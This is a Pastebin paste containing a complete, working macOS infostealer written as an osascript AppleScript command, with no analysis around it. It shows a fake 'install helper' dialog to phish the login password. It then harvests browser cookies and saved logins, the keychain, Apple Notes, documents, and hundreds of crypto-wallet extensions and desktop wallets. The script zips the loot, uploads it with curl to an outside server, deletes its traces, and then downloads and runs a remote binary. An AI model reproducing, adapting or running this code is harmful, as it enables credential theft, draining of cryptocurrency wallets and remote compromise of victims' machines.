API tools faq
paste
Guest User

Untitled

a guest
Aug 31st, 2025
371
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AppleScript 21.97 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. osascript -e 'on mkdir(someItem)
  2. try
  3. set filePosixPath to quoted form of (POSIX path of someItem)
  4. do shell script "mkdir -p " & filePosixPath
  5. end try
  6. end mkdir
  7. on readfile(pather)
  8. try
  9. set theFile to POSIX file pather
  10. set fileContents to read theFile
  11. return fileContents
  12. end try
  13. return ""
  14. end readfile
  15. on FileName(filePath)
  16. try
  17. set reversedPath to (reverse of every character of filePath) as string
  18. set trimmedPath to text 1 thru ((offset of "/" in reversedPath) - 1) of reversedPath
  19. set finalPath to (reverse of every character of trimmedPath) as string
  20. return finalPath
  21. end try
  22. return ""
  23. end FileName
  24. on Directory(filePath)
  25. try
  26. set lastSlash to offset of "/" in (reverse of every character of filePath) as string
  27. set trimmedPath to text 1 thru -(lastSlash + 1) of filePath
  28. return trimmedPath
  29. end try
  30. return ""
  31. end Directory
  32. on writeText(textToWrite, filePath)
  33. try
  34. set folderPath to Directory(filePath)
  35. mkdir(folderPath)
  36. set fileRef to (open for access filePath with write permission)
  37. set eof of fileRef to 0
  38. write textToWrite to fileRef starting at eof
  39. close access fileRef
  40. end try
  41. end writeText
  42. on readwrite(path_to_file, path_as_save)
  43. try
  44. set fileContent to read path_to_file
  45. set folderPath to Directory(path_as_save)
  46. mkdir(folderPath)
  47. do shell script "cat " & quoted form of path_to_file & " > " & quoted form of path_as_save
  48. end try
  49. end readwrite
  50. on isDir(someItem)
  51. try
  52. set filePosixPath to quoted form of (POSIX path of someItem)
  53. set fileType to (do shell script "file -b " & filePosixPath)
  54. if fileType ends with "directory" then
  55. return true
  56. end if
  57. end try
  58. return false
  59. end isDir
  60. on GrabFolder(sourceFolder, destinationFolder)
  61. try
  62. set exceptionsList to {".DS_Store", "Partitions", "Code Cache", "Cache", "market-history-cache.json", "journals", "Previews", "GPUCache", "DawnCache", "Crashpad", "DawnWebGPUCache", "DawnGraphiteCache", "__update__", "tor"}
  63. set fileList to list folder sourceFolder without invisibles
  64. mkdir(destinationFolder)
  65. repeat with currentItem in fileList
  66. if currentItem is not in exceptionsList then
  67. set itemPath to sourceFolder & "/" & currentItem
  68. set savePath to destinationFolder & "/" & currentItem
  69. if isDir(itemPath) then
  70. GrabFolder(itemPath, savePath)
  71. else
  72. readwrite(itemPath, savePath)
  73. end if
  74. end if
  75. end repeat
  76. end try
  77. end GrabFolder
  78. on GetUUID(pather, searchString)
  79. try
  80. set theFile to POSIX file pather
  81. set fileContents to read theFile
  82. set startPos to offset of searchString in fileContents
  83. if startPos is 0 then
  84. return "not found"
  85. end if
  86. set uuidStart to startPos + (length of searchString)
  87. set rawuuid to text uuidStart thru (uuidStart + 55) of fileContents
  88. set endpos to offset of "\\" in rawuuid
  89. if endpos is 0 then
  90. return "not found"
  91. end if
  92. set realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContents
  93. return realuuid
  94. on error
  95. return "not found"
  96. end try
  97. end GetUUID
  98. on firewallets(firepath, savePath)
  99. try
  100. set fire_wallets to {{"MetaMask", "[email protected]\\\":\\\""}, {"BNB_Chain_Wallet", "0a395005-c941-4030-83c9-018ee43e3414}\\\":\\\""}}
  101. repeat with fire_wallet in fire_wallets
  102. set uuid to GetUUID(firepath & "/prefs.js", item 2 of fire_wallet)
  103. if uuid is not "not found" then
  104. set walkpath to firepath & "/storage/default/"
  105. set fileList to list folder walkpath without invisibles
  106. repeat with currentItem in fileList
  107. if (currentItem contains uuid) and (currentItem contains "userContext") then
  108. set fwallet to walkpath & currentItem & "/idb/"
  109. set walletFiles to list folder fwallet without invisibles
  110. repeat with currentWallet in walletFiles
  111. if isDir(fwallet & currentWallet) then
  112. GrabFolder(fwallet & currentWallet, savePath & "/" & item 1 of fire_wallet & "/")
  113. end if
  114. end repeat
  115. end if
  116. end repeat
  117. end if
  118. end repeat
  119. end try
  120. end firewallets
  121. on parseFF(browsername, firefox, writemind)
  122. try
  123. set myFiles to {"/cookies.sqlite", "/formhistory.sqlite", "/key4.db", "/logins.json"}
  124. set fileList to list folder firefox without invisibles
  125. repeat with currentItem in fileList
  126. set brPrName to browsername & "_" & currentItem
  127. set savePath to writemind & "Brs/" & brPrName
  128. set extSavePath to writemind & "Exts/" & brPrName
  129. firewallets(firefox & currentItem, extSavePath)
  130. set readpath to firefox & currentItem
  131. repeat with FFile in myFiles
  132. readwrite(readpath & FFile, savePath & FFile)
  133. end repeat
  134. end repeat
  135. end try
  136. end parseFF
  137. on checkvalid(username, password_entered)
  138. try
  139. set result to do shell script "dscl . authonly " & quoted form of username & space & quoted form of password_entered
  140. if result is not equal to "" then
  141. return false
  142. else
  143. return true
  144. end if
  145. on error
  146. return false
  147. end try
  148. end checkvalid
  149. on getpwd(username, writemind)
  150. try
  151. if checkvalid(username, "") then
  152. set result to do shell script "security 2>&1 > /dev/null find-generic-password -ga \"Chrome\" | awk \"{print $2}\""
  153. writeText(result as string, writemind & "masterpass-chrome")
  154. else
  155. repeat
  156. set result to display dialog "Required Application Helper. Please enter device password to continue." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer
  157. set password_entered to text returned of result
  158. if checkvalid(username, password_entered) then
  159. return password_entered
  160. end if
  161. end repeat
  162. end if
  163. end try
  164. return ""
  165. end getpwd
  166. on grabPlugins(paths, savePath, pluginList, index)
  167. try
  168. set fileList to list folder paths without invisibles
  169. repeat with PFile in fileList
  170. repeat with currentPlugin in pluginList
  171. if (PFile contains currentPlugin) then
  172. set newpath to paths & PFile
  173. set newsavepath to savePath & "/" & currentPlugin
  174. if index then
  175. set newsavepath to newsavepath & "/IndexedDB/"
  176. end if
  177. GrabFolder(newpath, newsavepath)
  178. end if
  179. end repeat
  180. end repeat
  181. end try
  182. end grabPlugins
  183. on chromium(writemind, chromium_map)
  184. set pluginList to {"ldinpeekobnhjjdofggfgjlcehhmanlj", "nphplpgoakhhjchkkhmiggakijnkhfnd", "jbkgjmpfammbgejcpedggoefddacbdia", "fccgmnglbhajioalokbcidhcaikhlcpm", "nebnhfamliijlghikdgcigoebonmoibm", "fdcnegogpncmfejlfnffnofpngdiejii", "mfhbebgoclkghebffdldpobeajmbecfk", "ffbceckpkpbcmgiaehlloocglmijnpmp", "kfdniefadaanbjodldohaedphafoffoh", "bedogdpgdnifilpgeianmmdabklhfkcn", "kpfchfdkjhcoekhdldggegebfakaaiog", "klnaejjgbibmhlephnhpmaofohgkpgkd", "opcgpfmipidbgpenhmajoajpbobppdil", "mmmjbcfofconkannjonfmjjajpllddbg", "modjfdjcodmehnpccdjngmdfajggaoeh", "dkdedlpgdmmkkfjabffeganieamfklkm", "ifclboecfhkjbpmhgehodcjpciihhmif", "ppbibelpcjmhbdihakflkdcoccbgbkpo", "ejjladinnckdgjemekebdpeokbikhfci", "kkpllkodjeloidieedojogacfhpaihoh", "apnehcjmnengpnmccpaibjmhhoadaico", "jiepnaheligkibgcjgjepjfppgbcghmp", "jojhfeoedkpkglbfimdfabpdfjaoolaf", "idpdilbfamoopcfofbipefhmmnflljfi", "lbjapbcmmceacocpimbpbidpgmlmoaao", "oiohdnannmknmdlddkdejbmplhbdcbee", "fldfpgipfncgndfolcbkdeeknbbbnhcc", "fpkhgmpbidmiogeglndfbkegfdlnajnf", "lgmpcpglpngdoalbgeoldeajfclnhafa", "ilhaljfiglknggcoegeknjghdgampffk", "pfccjkejcgoppjnllalolplgogenfojk", "cnmamaachppnkjgnildpdmkaakejnhae", "eajafomhmkipbjmfmhebemolkcicgfmd", "emeeapjkbcbpbpgaagfchmcgglmebnen", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "hifafgmccdpekplomjjkcfgodnhcellj", "ffnbelfdoeiohenkjibnmadjiehjhajb", "fnjhmkhhmkbjkkabndcnnogagogbneec", "bcopgchhojmggmffilplmbdicgaihlkp", "cmoakldedjfnjofgbbfenefcagmedlga", "ifckdpamphokdglkkdomedpdegcjhjdp", "ibljocddagjghmlpgihahamcghfggcjc", "cjmkndjhnagcfbpiemnkdpomccnjblmj", "kbdcddcmgoplfockflacnnefaehaiocb", "cgeeodpfagjceefieflmdfphplkenlfk", "afbcbjpbpfadlkmhmclhkeeodmamcflc", "fdchdcpieegfofnofhgdombfckhbcokj", "gjlmehlldlphhljhpnlddaodbjjcchai", "ellkdbaphhldpeajbepobaecooaoafpg", "ojbcfhjmpigfobfclfflafhblgemeidi", "ghlmndacnhlaekppcllcpcjjjomjkjpg", "kgdijkcfiglijhaglibaidbipiejjfdp", "abkahkcbhngaebpcgfmhkoioedceoigp", "ammjlinfekkoockogfhdkgcohjlbhmff", "pdliaogehgdbhbnmkklieghmmjkpigpa", "jnlgamecbpmbajjfhmmmlhejkemejdma", "nbdhibgjnjpnkajaghbffjbkcgljfgdi", "jfdlamikmbghhapbgfoogdffldioobgl", "fijngjgcjhjmmpcmkeiomlglpeiijkld", "hgbeiipamcgbdjhfflifkgehomnmglgk", "pmmnimefaichbcnbndcfpaagbepnjaig", "cflgahhmjlmnjbikhakapcfkpbcmllam", "keenhcnmdmjjhincpilijphpiohdppno", "bipdhagncpgaccgdbddmbpcabgjikfkn", "bcenedbpaaegpnijoadpdjiachahncdg", "pocmplpaccanhmnllbbkpgfliimjljgo", "klghhnkeealcohjjanjjdaeeggmfmlpl", "cjookpbkjnpkmknedggeecikaponcalb", "ojggmchlghnjlapmfbnjholfjkiidbch", "dngmlblcodfobpdpecaadgfbcggfjfnm", "jnldfbidonfeldmalbflbmlebbipcnle", "ehjiblpccbknkgimiflboggcffmpphhp", "agoakfejjabomempkjlepdflaleeobhb", "fopmedgnkfpebgllppeddmmochcookhc", "dmkamcknogkgcdfhhbddcghachkejeap", "iglbgmakmggfkoidiagnhknlndljlolb", "opfgelmcmbiajamepnmloijbpoleiama", "gkeelndblnomfmjnophbhfhcjbcnemka", "dgiehkgfknklegdhekgeabnhgfjhbajd", "gafhhkghbfjjkeiendhlofajokpaflmk", "imlcamfeniaidioeflifonfjeeppblda", "penjlddjkjgpnkllboccdgccekpkcbin", "nhnkbkgjikgcigadomkphalanndcapjk", "egjidjbpglichdcondbcbdnbeeppgdph", "dlcobpjiigpikoobohmabehhmhfoodbb", "dldjpboieedgcmpkchcjcbijingjcgok", "acmacodkjbdgmoleebolmdjonilkdbch", "lccbohhgfkdikahanoclbdmaolidjdfl", "pcndjhkinnkaohffealmlmhaepkpmgkb", "gjagmgiddbbciopjhllkdnddhcglnemk", "cnncmdhjacpkmjmkcafchppbnpnhdmon", "mfgccjchihfkkindfppnaooecgfneiii", "ieldiilncjhfkalnemgjbffmpomcaigi", "ckklhkaabbmdjkahiaaplikpdddkenic", "loinekcabhlmhjjbocijdoimmejangoa", "mgffkfbidihjpoaomajlbgchddlicgpn", "pnndplcbkakcplkjnolgbkdgjikjednm", "mcohilncbfahbmgdjkbpemcciiolgcge", "bgpipimickeadkjlklgciifhnalhdjhe", "pdadjkfkgcafgbceimcpbkalnfnepbnk", "jiidiaalihmmhddjgbnbgdfflelocpak", "aeachknmefphepccionboohckonoeemg", "gdokollfhmnbfckbobkdbakhilldkhcj", "jiiigigdinhhgjflhljdkcelcjfmplnd", "kmphdnilpmdejikjdnlbcnmnabepfgkh", "jaooiolkmfcmloonphpiiogkfckgciom", "fcckkdbjnoikooededlapcalpionmalo", "mdnaglckomeedfbogeajfajofmfgpoae", "ebfidpplhabeedpnhjnobghokpiioolj", "dbgnhckhnppddckangcjbkjnlddbjkna", "cpmkedoipcpimgecpmgpldfpohjplkpp", "epapihdplajcdnnkdeiahlgigofloibg", "iokeahhehimjnekafflcihljlcjccdbe", "cihmoadaighcejopammfbmddcmdekcje", "hnfanknocfeofbddgcijnmhnfnkdnaad", "kilnpioakcdndlodeeceffgjdpojajlo", "abogmiocnneedmmepnohnhlijcjpcifd", "bofddndhbegljegmpmnlbhcejofmjgbn", "aholpfdialjgjfhomihkjbmgjidlcdno", "hdkobeeifhdplocklknbnejdelgagbao", "oafedfoadhdjjcipmcbecikgokpaphjk", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "nkbihfbeogaeaoehlefnkodbefgpgknn", "lfmmjkfllhmfmkcobchabopkcefjkoip", "aiifbnbfobpmeekipheeijimdpnlpgpp", "anokgmphncpekkhclmingpimjmcooifb", "mnfifefkajgofkcjkemidiaecocnkjeh", "momakdpclmaphlamgjcndbgfckjfpemp", "akkmagafhjjjjclaejjomkeccmjhdkpa", "ehgjhhccekdedpbkifaojjaefeohnoea", "mkpegjkblkkefacfnmkajcjmabijhclg", "mlhakagmgkmonhdonhkpjeebfphligng", "niiaamnmgebpeejeemoifgdndgeaekhe", "jnmbobjmhlngoefaiojfljckilhhlhcj", "onhogfjeacnfoofkfgppdlbmlmnplgbn", "kppfdiipphfccemcignhifpjkapfbihd", "hcjhpkgbmechpabifbggldplacolbkoh", "flpiciilemghbmfalicajoolhkkenfel", "mlbnicldlpdimbjdcncnklfempedeipj", "cfbfdhimifdmdehjmkdobpcjfefblkjm", "ocjobpilfplciaddcbafabcegbilnbnb", "pgiaagfkgcbnmiiolekcfmljdagdhlcm", "enabgbdfcbaehmbigakijjabdpdnimlg", "bifidjkcdpgfnlbcjpdkdcnbiooooblg", "lnnnmfcpbkafcpgdilckhmhbkkbpkmid", "nlgbhdfgdhgbiamfdfmbikcdghidoadd", "fcfcfllfndlomdhbehjjcoimbgofdncg", "lpilbniiabackdjcionkobglmddfbcjo", "efbglgofoippbgcjepnhiblaibcnclgk", "fhbohimaelbohpjbbldcngcnapndodjp", "gkodhkbmiflnmkipcmlhhgadebbeijhh", "bocpokimicclpaiekenaeelehdjllofo", "bhhhlbepdkbapadjdnnojkbgioiodbic", "aflkmfhebedbjioipglgcbcmnbpgliof", "mkchoaaiifodcflmbaphdgeidocajadp", "mapbhaebnddapnmifbbkgeedkeplgjmf", "lmkncnlpeipongihbffpljgehamdebgi", "gjnckgkfmgmibbkoficdidcljeaaaheg", "ppdadbejkmjnefldpcdjhnkpbjkikoip", "bopcbmipnjdcdfflfgjdgdjejmgpoaab", "kamfleanhcmjelnhaeljonilnmjpkcjc", "cphhlgmgameodnhkjdmkpanlelnlohao", "hnhobjmcibchnmglfbldbfabcgaknlkj", "nknhiehlklippafakaeklbeglecifhad", "kjjebdkfeagdoogagbhepmbimaphnfln", "phkbamefinggmakgklpkljjmgibohnba", "lakggbcodlaclcbbbepmkpdhbcomcgkd", "ookjlbkiijinhpmnjffcofjonbfbgaoc", "mdjmfdffdcmnoblignmgpommbefadffd", "jblndlipeogpafnldhgmapagcccfchpi", "hbbgbephgojikajhfbomhlmmollphcad", "dpcklmdombjcplafheapiblogdlgjjlb", "hmeobnfnfcmdkdcmlblgagmfpfboieaf", "kmhcihpebfmpgmihbkipmjlmmioameka", "kennjipeijpeengjlogfdjkiiadhbmjl", "amkmjjmmflddogmhpjloimipbofnfjih", "idnnbdplmphpflfnlkomgpfbpcgelopg", "fmblappgoiilbgafhjklehhfifbdocee", "heamnjbnflcikcggoiplibfommfbkjpj", "khpkpbbcccdmmclmpigdgddabeilkdpd", "omaabbefbmiijedngplfjmnooppbclkk", "nhlnehondigmgckngjomcpcefcdplmgc", "fiikommddbeccaoicoejoniammnalkfa", "ejbidfepgijlcgahbmbckmnaljagjoll", "glmhbknppefdmpemdmjnjlinpbclokhn", "kncchdigobghenbbaddojjnnaogfppfj", "hpclkefagolihohboafpheddmmgdffjm", "ilolmnhjbbggkmopnemiphomhaojndmb", "panpgppehdchfphcigocleabcmcgfoca", "nngceckbapebfimnlniiiahkandclblb", "hdokiejnpimakedhajhdlcegeplioahd", "eiaeiblijfjekdanodkjadfinkhbfgcd", "bfogiafebfohielmmehodmfbbebbbpei", "pnlccmojcmeohlpggmfnbbiapkmbliob", "aeblfdkhhhdcdjpifhhbdiojplfjncoa", "kmcfomidfpdkfieipokbalgegidffkal", "fdjamakpfbbddfjaooikfcpapjohcfmg", "ghmbeldphafepmbegfdlkpapadhbakde", "cnlhokffphohmfcddnibpohmkdfafdli", "khhapgacijodhjokkcjmleaempmchlem", "admmjipmmciaobhojoghlmleefbicajg", "caljgklbbfbcjjanaijlacgncafpegll"}
  185. set indexedPlugins to {"hnfanknocfeofbddgcijnmhnfnkdnaad", "mcohilncbfahbmgdjkbpemcciiolgcge", "aflkmfhebedbjioipglgcbcmnbpgliof", "enabgbdfcbaehmbigakijjabdpdnimlg", "cpmkedoipcpimgecpmgpldfpohjplkpp", "hdokiejnpimakedhajhdlcegeplioahd", "eiaeiblijfjekdanodkjadfinkhbfgcd", "cnlhokffphohmfcddnibpohmkdfafdli", "khhapgacijodhjokkcjmleaempmchlem", "hifafgmccdpekplomjjkcfgodnhcellj"}
  186. set chromiumFiles to {"/Network/Cookies", "/Cookies", "/Web Data", "/Login Data", "/Local Extension Settings/", "/IndexedDB/"}
  187. repeat with chromiumBrowser in chromium_map
  188. set brPrName to item 1 of chromiumBrowser & "_"
  189. set savePath to writemind & "Brs/" & brPrName
  190. set extSavePath to writemind & "Exts/" & brPrName
  191.  
  192. try
  193. set fileList to list folder item 2 of chromiumBrowser without invisibles
  194. repeat with currentItem in fileList
  195. if ((currentItem as string) is equal to "Default") or ((currentItem as string) contains "Profile") then
  196. repeat with CFile in chromiumFiles
  197. set readpath to (item 2 of chromiumBrowser & currentItem & CFile)
  198. if ((CFile as string) is equal to "/Network/Cookies") then
  199. set CFile to "/Cookies"
  200. end if
  201. if ((CFile as string) is equal to "/Local Extension Settings/") then
  202. grabPlugins(readpath, extSavePath & currentItem, pluginList, false)
  203. else if (CFile as string) is equal to "/IndexedDB/" then
  204. grabPlugins(readpath, extSavePath & currentItem, indexedPlugins, true)
  205. else
  206. set writepath to savePath & currentItem & CFile
  207. readwrite(readpath, writepath)
  208. end if
  209. end repeat
  210. end if
  211. end repeat
  212. end try
  213. end repeat
  214. end chromium
  215. on filegrabber(writemind)
  216. try
  217. set destFolder to writemind & "Files/"
  218. set ntsP to writemind & "Notes/"
  219. set destinationFolderPath to POSIX file destFolder
  220. set ntsPDF to POSIX file ntsP
  221. set notesMediaFolder to POSIX file (ntsP & "Media/")
  222. set extensionsList to {"txt", "pdf", "docx", "wallet", "key", "keys", "doc", "jpeg", "png", "kdbx", "rtf", "jpg"}
  223. set bankSize to 0
  224. set notesBankSize to 0
  225. set uuidString to do shell script "system_profiler SPHardwareDataType | awk \"/UUID/ { print $3 }\""
  226. mkdir(destinationFolderPath)
  227. mkdir(notesMediaFolder)
  228. tell application "Finder"
  229. try
  230. set safariFolderPath to (path to home folder as text) & "Library:Cookies:"
  231. duplicate file (safariFolderPath & "Cookies.binarycookies") to folder destinationFolderPath with replacing
  232. set name of result to "saf1"
  233. end try
  234. set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
  235. try
  236. duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing
  237. end try
  238. set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"
  239. try
  240. set notesFolder to folder notesFolderPath
  241. set notesFiles to {"NoteStore.sqlite", "NoteStore.sqlite-shm", "NoteStore.sqlite-wal"}
  242. repeat with aFile in notesFiles
  243. try
  244. duplicate (file aFile of notesFolder) to folder ntsPDF with replacing
  245. end try
  246. end repeat
  247. end try
  248. set notesAccountsPath to (notesFolderPath & "Accounts:")
  249. try
  250. set notesAccountsFolder to folder notesAccountsPath
  251. set notesAccountsFiles to every folder of notesAccountsFolder
  252. repeat with nFile in notesAccountsFiles
  253. set notesMediaPath to notesAccountsPath & name of nFile & ":Media:"
  254. set notesMediaAllProfiles to every folder of (folder notesMediaPath)
  255. repeat with profileFolder in notesMediaAllProfiles
  256. set notesMediaProfilesPath to notesMediaPath & name of profileFolder
  257. set notesMediaProfileFiles to every folder of (folder notesMediaProfilesPath)
  258. repeat with notesUUID in notesMediaProfileFiles
  259. set noteIdFiles to every file of notesUUID
  260. repeat with notesIdFile in noteIdFiles
  261. try
  262. set fileSize to size of notesIdFile as text
  263. set notesBankSize to notesBankSize + fileSize
  264. if notesBankSize < 12 * 1024 * 1024 then
  265. duplicate notesIdFile to notesMediaFolder with replacing
  266. else
  267. exit repeat
  268. end if
  269. end try
  270. end repeat
  271. end repeat
  272. end repeat
  273. end repeat
  274. end try
  275. try
  276. set safariFolderPath to (path to library folder from user domain as text) & "Safari:"
  277. duplicate (file "Form Values" of folder safariFolderPath) to destinationFolderPath with replacing
  278. end try
  279. try
  280. set keychainFolder to (path to library folder from user domain as text) & "Keychains:" & uuidString
  281. duplicate folder keychainFolder to destinationFolderPath with replacing
  282. end try
  283. try
  284. set desktopFiles to every file of desktop
  285. set documentsFiles to every file of folder "Documents" of (path to home folder)
  286. repeat with aFile in (desktopFiles & documentsFiles)
  287. set fileExtension to name extension of aFile
  288. if fileExtension is in extensionsList then
  289. set fileSize to size of aFile
  290. if (bankSize + fileSize) < 10 * 1024 * 1024 then
  291. try
  292. duplicate aFile to folder destinationFolderPath with replacing
  293. set bankSize to bankSize + fileSize
  294. end try
  295. else
  296. exit repeat
  297. end if
  298. end if
  299. end repeat
  300. end try
  301. end tell
  302. end try
  303. end filegrabber
  304. on send_data(attempt, outUsername, serverIP, isBot)
  305. try
  306. set result_send to (do shell script "curl -X POST -H \"X-Bid: " & "f48fbe39836779cadbf148b5952919fd" & "\" -F \"lil-arch=@/tmp/salmonela.zip\" https://meshsorterio.com/api/data/receive")
  307. on error
  308. if attempt < 10 then
  309. delay 60
  310. send_data(attempt + 1, outUsername, serverIP)
  311. end if
  312. end try
  313. end send_data
  314.  
  315. on snd_rn(attempt)
  316. try
  317. set result_send to (do shell script "curl -X POST -H \"X-Bid: f48fbe39836779cadbf148b5952919fd\" https://meshsorterio.com/api/health")
  318. on error
  319. if attempt < 2 then
  320. delay 10
  321. snd_rn(attempt + 1, outUsername, serverIP)
  322. end if
  323. end try
  324. end snd_rn
  325.  
  326. on main()
  327. snd_rn(0)
  328. set username to (system attribute "USER")
  329. set outUsername to "a"
  330. set serverIP to "localhost"
  331. set isBot to ""
  332. set systemProfile to "/Users/" & username
  333. writeText(outUsername, systemProfile & "/.username")
  334. set writemind to "/tmp/salmonela/"
  335. try
  336. set result_userinfo to (do shell script "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType")
  337. writeText(result_userinfo, writemind & "hardware")
  338. end try
  339. set rawlib to systemProfile & "/Library/"
  340. set library to rawlib & "Application Support/"
  341. set password_entered to readfile(systemProfile & "/.pwd")
  342. if not checkvalid(username, password_entered) then
  343. set password_entered to getpwd(username, writemind)
  344. writeText(password_entered, systemProfile & "/.pwd")
  345. end if
  346. delay 0.01
  347. writeText(password_entered, writemind & "ggwp")
  348.  
  349. set noteStorePath to rawlib & "Group Containers/group.com.apple.notes/NoteStore.sqlite"
  350. readwrite(rawlib, writemind & "Notes/NoteStore.sqlite")
  351. readwrite(rawlib & "-wal", writemind & "Notes/NoteStore.sqlite-wal")
  352. readwrite(rawlib & "-shm", writemind & "Notes/NoteStore.sqlite-shm")
  353. readwrite(rawlib & "Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies", writemind & "Files/Cookies.binarycookies")
  354. readwrite(rawlib & "Cookies/Cookies.binarycookies", writemind & "Files/saf1")
  355.  
  356. filegrabber(writemind)
  357.  
  358. set chromiumMap to {{"chr", library & "Google/Chrome/"}, {"brave", library & "BraveSoftware/Brave-Browser/"}, {"edge", library & "Microsoft Edge/"}, {"viva", library & "Vivaldi/"}, {"op", library & "com.operasoftware.Opera/"}, {"opgx", library & "com.operasoftware.OperaGX/"}, {"chr_b", library & "Google/Chrome Beta/"}, {"chr_c", library & "Google/Chrome Canary"}, {"chrm", library & "Chromium/"}, {"chr_dev", library & "Google/Chrome Dev/"}, {"arc", library & "Arc/User Data/"}}
  359.  
  360. set walletMap to {{"Electrum", systemProfile & "/.electrum/wallets/"}, {"Coinomi", library & "Coinomi/wallets/"}, {"Exodus", library & "Exodus/"}, {"Atomic", library & "atomic/Local Storage/leveldb/"}, {"Wasabi", systemProfile & "/.walletwasabi/client/Wallets/"}, {"Ledger_Live", library & "Ledger Live/"}, {"Monero", systemProfile & "/Monero/wallets/"}, {"Bitcoin_Core", library & "Bitcoin/wallets/"}, {"Litecoin_Core", library & "Litecoin/wallets/"}, {"Dash_Core", library & "DashCore/wallets/"}, {"Electrum_LTC", systemProfile & "/.electrum-ltc/wallets/"}, {"Electron_Cash", systemProfile & "/.electron-cash/wallets/"}, {"Guarda", library & "Guarda/"}, {"Dogecoin_Core", library & "Dogecoin/wallets/"}, {"Trezor_Suite", library & "@trezor/suite-desktop/"}}
  361. readwrite(library & "Binance/app-store.json", writemind & "deskwallets/Binance/app-store.json")
  362. readwrite(library & "@tonkeeper/desktop/config.json", "deskwallets/TonKeeper/config.json")
  363. readwrite(rawlib & "Keychains/login.keychain-db", writemind & "Kch/login.keychain-db")
  364.  
  365. writeText(username, writemind & "user")
  366. set ff_paths to {{"ff", library & "Firefox/Profiles/"}, {"wf", library & "Waterfox/Profiles/"}}
  367. repeat with gecko in ff_paths
  368. try
  369. parseFF(item 1 of gecko, item 2 of gecko, writemind)
  370. end try
  371. end repeat
  372.  
  373. repeat with deskWallet in walletMap
  374. GrabFolder(item 2 of deskWallet, writemind & "Wlt/" & item 1 of deskWallet)
  375. end repeat
  376. chromium(writemind, chromiumMap)
  377. do shell script "ditto -c -k --sequesterRsrc " & writemind & " /tmp/salmonela.zip"
  378. send_data(0, outUsername, serverIP, isBot)
  379. do shell script "rm -r " & writemind
  380. do shell script "rm /tmp/salmonela.zip"
  381. end main
  382.  
  383. main()' & osascript -e 'try
  384. delay 30
  385. do shell script "cd /tmp/ && curl https://gamma.meshsorterio.com/trovo/index.php --output SHS.zip && unzip -o SHS.zip && chmod +x shell && ./shell"
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!